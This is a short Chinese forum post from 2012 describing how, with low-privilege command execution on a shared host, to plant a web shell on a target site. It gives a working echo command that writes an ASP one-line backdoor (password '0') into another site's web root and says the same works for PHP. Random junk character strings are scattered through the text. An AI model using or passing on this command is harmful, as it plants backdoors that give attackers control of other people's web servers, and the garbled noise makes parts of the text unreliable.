在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
$ _5 \3 K1 {* O) J, a8 X; @! P; @* v/ s5 @1 |. W" H' J
命令格式
$ j" B1 q$ }$ A: ?+ r# j, X& |; v- c+ l
Echo 语句 >目标站绝对目录1 t3 q/ M/ L a0 \ b+ F
4 I( Y+ Y4 s+ u* w例如: % r1 o/ }# I* w6 d- m! C6 w
* v6 @# S8 P) `. S% wecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
( S" s7 W, u7 p+ `( ~, `& t$ t' V, |" t: V! W
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
9 l! E+ [7 b, X; w* b1 K |
发表于 2012-9-23 14:40:24
收藏
支持
反对